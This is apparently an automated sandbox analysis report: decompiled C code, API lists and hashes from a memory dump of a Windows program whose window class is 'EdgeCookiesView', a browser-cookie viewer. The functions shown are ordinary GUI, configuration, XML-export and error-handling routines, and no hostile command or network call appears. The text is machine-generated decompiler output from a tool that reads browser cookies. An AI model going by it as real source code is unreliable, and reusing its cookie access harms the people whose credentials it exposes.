                                                                                                                                                					 *((intOrPtr*)(_t73 + 0x20c)) = 1;
                                                                                                                                                					 *(_t73 + 0x210) = _t46;
                                                                                                                                                				}
                                                                                                                                                				if( *((intOrPtr*)(_t71 + 8)) == 0xfffffdee) {
                                                                                                                                                					_t46 = SendMessageW( *(_t73 + 0x218), 0x423, 0, 0);
                                                                                                                                                					if( *_t71 == _t46) {
                                                                                                                                                						_t46 = GetMenuStringW( *(_t73 + 0x21c),  *(_t71 + 4), _t71 + 0x10, 0x4f, 0);
                                                                                                                                                						 *(_t71 + 0xb0) =  *(_t71 + 0xb0) & 0x00000000;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				if(_a4 != 0x103) {
                                                                                                                                                					L29:
                                                                                                                                                					return _t46;
                                                                                                                                                				} else {
                                                                                                                                                					if( *((intOrPtr*)(_t71 + 8)) == 0xfffffffd) {
                                                                                                                                                						_t46 = E0040B0C2(_t73);
                                                                                                                                                						_t71 = _a8;
                                                                                                                                                					}
                                                                                                                                                					if( *((intOrPtr*)(_t71 + 8)) == 0xffffff94) {
                                                                                                                                                						_t64 = 0;
                                                                                                                                                						if(GetKeyState(0x10) < 0) {
                                                                                                                                                							_t64 = 1;
                                                                                                                                                						}
                                                                                                                                                						_t46 = E00407CA2( *(_t71 + 0x10), _t67,  *((intOrPtr*)(_t73 + 0x69c)), 0, _t64);
                                                                                                                                                						_t73 = _v8;
                                                                                                                                                						_t71 = _a8;
                                                                                                                                                					}
                                                                                                                                                					_t68 =  *((intOrPtr*)(_t73 + 0x69c));
                                                                                                                                                					if( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x69c)) + 0x2f4)) != 0) {
                                                                                                                                                						_t92 =  *((intOrPtr*)(_t71 + 8)) - 0xffffff4f;
                                                                                                                                                						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4f) {
                                                                                                                                                							_t46 = E0040824E(_t71, _t68, _t92);
                                                                                                                                                						}
                                                                                                                                                						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4d) {
                                                                                                                                                							_t63 =  *((intOrPtr*)(_t73 + 0x69c));
                                                                                                                                                							_t46 = E004081B3(_t71,  *((intOrPtr*)(_t73 + 0x69c)), 0);
                                                                                                                                                							if(_t46 == 0xffffffff && ( *(_t71 + 0x10) & 0x0000000c) != 0) {
                                                                                                                                                								_t46 = E004081B3(_t71, _t63, 1);
                                                                                                                                                							}
                                                                                                                                                							 *((intOrPtr*)(_t73 + 0x20c)) = 1;
                                                                                                                                                							 *(_t73 + 0x210) = _t46;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					if( *((intOrPtr*)(_t71 + 8)) != 0xffffff9b) {
                                                                                                                                                						goto L29;
                                                                                                                                                					} else {
                                                                                                                                                						_t46 = E00402D29(_t71);
                                                                                                                                                						if(_t46 == 0) {
                                                                                                                                                							goto L29;
                                                                                                                                                						}
                                                                                                                                                						_t46 = _t73 + 0x280;
                                                                                                                                                						if( *_t46 != 0) {
                                                                                                                                                							goto L29;
                                                                                                                                                						}
                                                                                                                                                						 *_t46 = 1;
                                                                                                                                                						return E00401BDC(_t73, 0x402);
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                			}

                                                                                                                                                0x0040b75a
                                                                                                                                                0x0040b767
                                                                                                                                                0x0040b76c
                                                                                                                                                0x0040b76f
                                                                                                                                                0x0040b76f
                                                                                                                                                0x0040b772
                                                                                                                                                0x0040b77f
                                                                                                                                                0x0040b781
                                                                                                                                                0x0040b788
                                                                                                                                                0x0040b78c
                                                                                                                                                0x0040b78c
                                                                                                                                                0x0040b798
                                                                                                                                                0x0040b79a
                                                                                                                                                0x0040b7a6
                                                                                                                                                0x0040b7ae
                                                                                                                                                0x0040b7bc
                                                                                                                                                0x0040b7bc
                                                                                                                                                0x0040b7c1
                                                                                                                                                0x0040b7cb
                                                                                                                                                0x0040b7cb
                                                                                                                                                0x0040b798
                                                                                                                                                0x0040b7d5
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b7d7
                                                                                                                                                0x0040b7e6
                                                                                                                                                0x0040b7ed
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b7ef
                                                                                                                                                0x0040b7f8
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b7fa
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b807
                                                                                                                                                0x0040b7d5

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040B698
                                                                                                                                                  • Part of subcall function 00405CD2: ShellExecuteW.SHELL32(?,open,?,0040F454,0040F454,00000005), ref: 00405CE8
                                                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040B704
                                                                                                                                                • GetMenuStringW.USER32 ref: 0040B71F
                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0040B74F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                • String ID: < A
                                                                                                                                                • API String ID: 3550944819-1181716546
                                                                                                                                                • Opcode ID: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
                                                                                                                                                • Instruction ID: cd89550f5cd4c0fed4b6d451fcd4293cb33e7e96a54fd1b4e036968a3aaec8cf
                                                                                                                                                • Opcode Fuzzy Hash: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
                                                                                                                                                • Instruction Fuzzy Hash: 9541A570600705EBDB20AF25C8897A6B365FF50325F10863EE5796B6D1C7B9AC91CB8C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040B147(void* __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                				void _v526;
                                                                                                                                                				long _v528;
                                                                                                                                                				short _v1050;
                                                                                                                                                				long _v1572;
                                                                                                                                                				intOrPtr _v1576;
                                                                                                                                                				char _v1580;
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				wchar_t* _t24;
                                                                                                                                                				void* _t41;
                                                                                                                                                				void* _t42;
                                                                                                                                                
                                                                                                                                                				_t41 = __ecx;
                                                                                                                                                				_t42 = __eax;
                                                                                                                                                				if( *((intOrPtr*)(__eax + 0x27c)) == 0) {
                                                                                                                                                					_v528 = 0;
                                                                                                                                                					memset( &_v526, 0, 0x208);
                                                                                                                                                					E00405800( &_v528);
                                                                                                                                                					_t24 = wcsrchr( &_v528, 0x2e);
                                                                                                                                                					if(_t24 != 0) {
                                                                                                                                                						 *_t24 = 0;
                                                                                                                                                					}
                                                                                                                                                					wcscat( &_v528, L".cfg");
                                                                                                                                                					_v1576 = _a4;
                                                                                                                                                					_v1580 = 0x410838;
                                                                                                                                                					_v1572 = 0;
                                                                                                                                                					_v1050 = 0;
                                                                                                                                                					wcscpy( &_v1572,  &_v528);
                                                                                                                                                					E0040D909( &_v1580);
                                                                                                                                                					_t45 =  &_v1580;
                                                                                                                                                					E00401C0A( *((intOrPtr*)(_t42 + 0x698)),  &_v1580);
                                                                                                                                                					E0040196B(_t42, _t41,  &_v1580);
                                                                                                                                                					return E004077F5(_t45, _t41,  *((intOrPtr*)(_t42 + 0x69c)));
                                                                                                                                                				}
                                                                                                                                                				return __eax;
                                                                                                                                                			}
                                                                                                                                                0x0040b147
                                                                                                                                                0x0040b152
                                                                                                                                                0x0040b15c
                                                                                                                                                0x0040b16f
                                                                                                                                                0x0040b176
                                                                                                                                                0x0040b182
                                                                                                                                                0x0040b190
                                                                                                                                                0x0040b19a
                                                                                                                                                0x0040b19c
                                                                                                                                                0x0040b19c
                                                                                                                                                0x0040b1ac
                                                                                                                                                0x0040b1b4
                                                                                                                                                0x0040b1c8
                                                                                                                                                0x0040b1d2
                                                                                                                                                0x0040b1d9
                                                                                                                                                0x0040b1e0
                                                                                                                                                0x0040b1ee
                                                                                                                                                0x0040b1f9
                                                                                                                                                0x0040b1ff
                                                                                                                                                0x0040b206
                                                                                                                                                0x00000000
                                                                                                                                                0x0040b218
                                                                                                                                                0x0040b21c

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040B176
                                                                                                                                                  • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                • wcsrchr.MSVCRT ref: 0040B190
                                                                                                                                                • wcscat.MSVCRT ref: 0040B1AC
                                                                                                                                                • wcscpy.MSVCRT ref: 0040B1E0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleNamememsetwcscatwcscpywcsrchr
                                                                                                                                                • String ID: .cfg
                                                                                                                                                • API String ID: 3959449883-3410578098
                                                                                                                                                • Opcode ID: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
                                                                                                                                                • Instruction ID: 6b4b3dac03b364a6e9d67aab511530dcf3da6c65583dd03dece53c0e4fe42f45
                                                                                                                                                • Opcode Fuzzy Hash: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
                                                                                                                                                • Instruction Fuzzy Hash: 0611BC739016285ACB20EB65CC45ACEB37DEF48314F0041F7E518B7142E7759A958F9D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                			E00408E65(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                				void _v514;
                                                                                                                                                				signed short _v516;
                                                                                                                                                				signed short* _t30;
                                                                                                                                                				signed short* _t34;
                                                                                                                                                				signed int _t37;
                                                                                                                                                				void* _t40;
                                                                                                                                                				signed short* _t44;
                                                                                                                                                				void* _t46;
                                                                                                                                                
                                                                                                                                                				_t40 = __edi;
                                                                                                                                                				_t38 = __ecx;
                                                                                                                                                				E00408857(__edi, __ecx, _a4, L"<item>\r\n");
                                                                                                                                                				_t37 = 0;
                                                                                                                                                				if( *((intOrPtr*)(__edi + 0x34)) > 0) {
                                                                                                                                                					do {
                                                                                                                                                						_v516 = _v516 & 0x00000000;
                                                                                                                                                						memset( &_v514, 0, 0x1fc);
                                                                                                                                                						_t30 =  *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x68)));
                                                                                                                                                						_t38 =  *((intOrPtr*)(__edi + 0x6c));
                                                                                                                                                						E0040DBDA(_t30,  *((intOrPtr*)(__edi + 0x6c)));
                                                                                                                                                						_t44 =  &_v516;
                                                                                                                                                						E004086F5(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x48)) + 0x10)));
                                                                                                                                                						_t34 = _t44;
                                                                                                                                                						_push(_t34);
                                                                                                                                                						_push( *((intOrPtr*)(__edi + 0x6c)));
                                                                                                                                                						_push(_t34);
                                                                                                                                                						_push(L"<%s>%s</%s>\r\n");
                                                                                                                                                						_push(0x2000);
                                                                                                                                                						_push( *((intOrPtr*)(__edi + 0x70)));
                                                                                                                                                						L0040DFD6();
                                                                                                                                                						_t46 = _t46 + 0x24;
                                                                                                                                                						E00408857(__edi,  *((intOrPtr*)(__edi + 0x6c)), _a4,  *((intOrPtr*)(__edi + 0x70)));
                                                                                                                                                						_t37 = _t37 + 1;
                                                                                                                                                					} while (_t37 <  *((intOrPtr*)(__edi + 0x34)));
                                                                                                                                                				}
                                                                                                                                                				return E00408857(_t40, _t38, _a4, L"</item>\r\n");
                                                                                                                                                 			}

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00408E9C
                                                                                                                                                  • Part of subcall function 0040DBDA: memcpy.MSVCRT ref: 0040DC57
                                                                                                                                                  • Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
                                                                                                                                                  • Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D
                                                                                                                                                • _snwprintf.MSVCRT ref: 00408EE6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                                                • Opcode ID: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
                                                                                                                                                • Instruction ID: 8f4cdbf62ca08d82a34ba29bd692b6b076faad5caef0efcefbde8902b8c83394
                                                                                                                                                • Opcode Fuzzy Hash: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
                                                                                                                                                • Instruction Fuzzy Hash: BC11BF32A0021ABBDB11BF25CD86E997B25BF04308F00407AF945776A2C739B864DBD8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040BA94(void* __esi) {
                                                                                                                                                				struct _WNDCLASSW _v44;
                                                                                                                                                				struct HINSTANCE__* _t20;
                                                                                                                                                				struct HWND__* _t23;
                                                                                                                                                
                                                                                                                                                				_v44.style = 0;
                                                                                                                                                				_v44.lpfnWndProc = E00401896;
                                                                                                                                                				_v44.cbClsExtra = 0;
                                                                                                                                                				_v44.cbWndExtra = 0;
                                                                                                                                                				_v44.hInstance = GetModuleHandleW(0);
                                                                                                                                                				_v44.hIcon =  *((intOrPtr*)(__esi + 0x204));
                                                                                                                                                				_v44.lpszClassName = __esi + 4;
                                                                                                                                                				_v44.hCursor = 0;
                                                                                                                                                				_v44.hbrBackground = 0x10;
                                                                                                                                                				_v44.lpszMenuName = 0;
                                                                                                                                                				RegisterClassW( &_v44);
                                                                                                                                                				_t20 = GetModuleHandleW(0);
                                                                                                                                                				_t23 = CreateWindowExW(0, L"EdgeCookiesView", L"EdgeCookiesView", 0xcf0000, 0x80000000, 0x80000000, 0x280, 0x1e0, 0, 0, _t20, __esi);
                                                                                                                                                				 *(__esi + 0x208) = _t23;
                                                                                                                                                				return _t23;
                                                                                                                                                 			}

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,74B04E00,00000000), ref: 0040BAB5
                                                                                                                                                • RegisterClassW.USER32 ref: 0040BADA
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040BAE1
                                                                                                                                                • CreateWindowExW.USER32 ref: 0040BB05
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                • String ID: EdgeCookiesView
                                                                                                                                                • API String ID: 2678498856-2656830938
                                                                                                                                                • Opcode ID: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
                                                                                                                                                • Instruction ID: 27e191b6334208d49ef5ca2aa5ba4bd18f44ae4e1b08ed08d13d2dfcc62d9bb3
                                                                                                                                                • Opcode Fuzzy Hash: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
                                                                                                                                                • Instruction Fuzzy Hash: 3A01C8B1900208AFD711DF9A8D85AFFFBFCEB88710F10402AE915F2251D7B459458BA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E00406DE5(void* __eflags, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12) {
                                                                                                                                                				void _v8198;
                                                                                                                                                				short _v8200;
                                                                                                                                                				void* _t18;
                                                                                                                                                
                                                                                                                                                				E0040E340(0x2004, _t18);
                                                                                                                                                				_v8200 = _v8200 & 0x00000000;
                                                                                                                                                				memset( &_v8198, 0, 0x2000);
                                                                                                                                                				GetPrivateProfileStringW(0x412e48, _a4, 0x40f454,  &_v8200, 0x1000, 0x412c38);
                                                                                                                                                				if(_v8200 == 0 || _a12 != 0) {
                                                                                                                                                					return WritePrivateProfileStringW(0x412e48, _a4, _a8, 0x412c38);
                                                                                                                                                				} else {
                                                                                                                                                					return 0;
                                                                                                                                                				}
                                                                                                                                                 			}

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00406E0A
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00406E32
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00412E48,?,?,00412C38), ref: 00406E54
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                 • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString$Writememset
                                                                                                                                                • String ID: 8,A$H.A
                                                                                                                                                • API String ID: 747731527-1209539780
                                                                                                                                                • Opcode ID: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
                                                                                                                                                • Instruction ID: e7880ec6ba8d46fe6e1110b4845dc0794c3ddc75899781143fe08dcc0165ab72
                                                                                                                                                • Opcode Fuzzy Hash: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
                                                                                                                                                • Instruction Fuzzy Hash: 91F0C836501318BAEB205B11CD4DFCB3779DB54714F004471BB05B61C2D3B89A94C6AD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                			E004053B1(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                				char _v2052;
                                                                                                                                                				short _v4100;
                                                                                                                                                				void* __edi;
                                                                                                                                                				long _t15;
                                                                                                                                                				long _t16;
                                                                                                                                                
                                                                                                                                                				_t15 = __ecx;
                                                                                                                                                				E0040E340(0x1000, __ecx);
                                                                                                                                                				_t16 = _t15;
                                                                                                                                                				if(_t16 == 0) {
                                                                                                                                                					_t16 = GetLastError();
                                                                                                                                                				}
                                                                                                                                                				E004052B3(_t16,  &_v2052);
                                                                                                                                                				_push( &_v2052);
                                                                                                                                                				_push(_t16);
                                                                                                                                                				_push(L"Error %d: %s");
                                                                                                                                                				_push(0x400);
                                                                                                                                                				_push( &_v4100);
                                                                                                                                                				L0040DFD6();
                                                                                                                                                				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                                                                                			}

                                                                                                                                                0x004053b1
                                                                                                                                                0x004053b9
                                                                                                                                                0x004053bf
                                                                                                                                                0x004053c3
                                                                                                                                                0x004053cb
                                                                                                                                                0x004053cb
                                                                                                                                                0x004053d4
                                                                                                                                                0x004053df
                                                                                                                                                0x004053e0
                                                                                                                                                0x004053e1
                                                                                                                                                0x004053ec
                                                                                                                                                0x004053f1
                                                                                                                                                0x004053f2
                                                                                                                                                0x00405413

                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 004053C5
                                                                                                                                                • _snwprintf.MSVCRT ref: 004053F2
                                                                                                                                                • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                • API String ID: 313946961-1552265934
                                                                                                                                                • Opcode ID: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
                                                                                                                                                • Instruction ID: d03f13e4b5835148045d3301d553e71923c4c821524e10c745d4efb14aa9052b
                                                                                                                                                • Opcode Fuzzy Hash: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
                                                                                                                                                • Instruction Fuzzy Hash: 7BF0277A54020866CB21A795CC01FDA73FCFB44780F0404BBBA05F3181EAB4EA488E59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                			E0040DB6F(intOrPtr _a4) {
                                                                                                                                                				_Unknown_base(*)()* _t3;
                                                                                                                                                				void* _t7;
                                                                                                                                                				struct HINSTANCE__* _t8;
                                                                                                                                                
                                                                                                                                                				_t7 = 0;
                                                                                                                                                				_t8 = LoadLibraryW(L"shlwapi.dll");
                                                                                                                                                				_t3 = GetProcAddress(_t8, "SHAutoComplete");
                                                                                                                                                				if(_t3 != 0) {
                                                                                                                                                					_t7 =  *_t3(_a4, 0x10000001);
                                                                                                                                                				}
                                                                                                                                                				FreeLibrary(_t8);
                                                                                                                                                				return _t7;
                                                                                                                                                			}

                                                                                                                                                0x0040db76
                                                                                                                                                0x0040db7e
                                                                                                                                                0x0040db86
                                                                                                                                                0x0040db8e
                                                                                                                                                0x0040db9b
                                                                                                                                                0x0040db9b
                                                                                                                                                0x0040db9e
                                                                                                                                                0x0040dba8

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,00402FB4,00000000), ref: 0040DB78
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                • API String ID: 145871493-1506664499
                                                                                                                                                • Opcode ID: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
                                                                                                                                                • Instruction ID: 4ee66759be8abf9dca1a37f43ee2ec86a07497b6dee4ca36e5f36349581f2197
                                                                                                                                                • Opcode Fuzzy Hash: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
                                                                                                                                                • Instruction Fuzzy Hash: 3ED05B353111506BF7215736AD08EEF3AA5DFC57517050033F904E3152DB744D8A86BD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00406B34(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                				struct tagPOINT _v20;
                                                                                                                                                				struct tagRECT _v36;
                                                                                                                                                				int _t27;
                                                                                                                                                				struct HWND__* _t31;
                                                                                                                                                				struct HWND__* _t33;
                                                                                                                                                
                                                                                                                                                				_t31 = _a4;
                                                                                                                                                				if((_a8 & 0x00000001) != 0) {
                                                                                                                                                					_t33 = GetParent(_t31);
                                                                                                                                                					GetWindowRect(_t31,  &_v20);
                                                                                                                                                					GetClientRect(_t33,  &_v36);
                                                                                                                                                					MapWindowPoints(0, _t33,  &_v20, 2);
                                                                                                                                                					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                                                                					_v20.x = _t27;
                                                                                                                                                					SetWindowPos(_t31, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                                                                				}
                                                                                                                                                				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                					E00405D0F(_t31, 0x400000);
                                                                                                                                                				}
                                                                                                                                                				return 1;
                                                                                                                                                			}

                                                                                                                                                0x00406b3f
                                                                                                                                                0x00406b42
                                                                                                                                                0x00406b4c
                                                                                                                                                0x00406b53
                                                                                                                                                0x00406b5e
                                                                                                                                                0x00406b6e
                                                                                                                                                0x00406b7c
                                                                                                                                                0x00406b84
                                                                                                                                                0x00406b8a
                                                                                                                                                0x00406b90
                                                                                                                                                0x00406b95
                                                                                                                                                0x00406b9d
                                                                                                                                                0x00406ba3
                                                                                                                                                0x00406ba9

                                                                                                                                                APIs
                                                                                                                                                • GetParent.USER32(?), ref: 00406B46
                                                                                                                                                • GetWindowRect.USER32 ref: 00406B53
                                                                                                                                                • GetClientRect.USER32 ref: 00406B5E
                                                                                                                                                • MapWindowPoints.USER32 ref: 00406B6E
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00406B8A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                • Opcode ID: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
                                                                                                                                                • Instruction ID: 8e7a0edbc95fdcc56b15363f287b575cc5c7f3f2b2b94fa66e9be29a0ee7bcd8
                                                                                                                                                • Opcode Fuzzy Hash: aadb3aabc8d190ce9a7aff4ddfd3f7f2d7078e10d6ba6da20b60776d39ee92c3
                                                                                                                                                • Instruction Fuzzy Hash: 48015732400129ABDB219BA59C49EFFBFBCEF06714F04413AF901F2080D778A5058BA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                			E00409F23(void* __eax, int __ebx, void* _a4) {
                                                                                                                                                				signed int _v8;
                                                                                                                                                				signed int _v12;
                                                                                                                                                				void* _v16;
                                                                                                                                                				void* _t20;
                                                                                                                                                				void* _t21;
                                                                                                                                                				signed int _t28;
                                                                                                                                                				void* _t32;
                                                                                                                                                				void* _t34;
                                                                                                                                                
                                                                                                                                                				_t20 = __eax;
                                                                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                                                                				_push(__ebx);
                                                                                                                                                				_t28 = __eax - 1;
                                                                                                                                                				L0040E038();
                                                                                                                                                				_v16 = __eax;
                                                                                                                                                				if(_t28 > 0) {
                                                                                                                                                					_t21 = _a4;
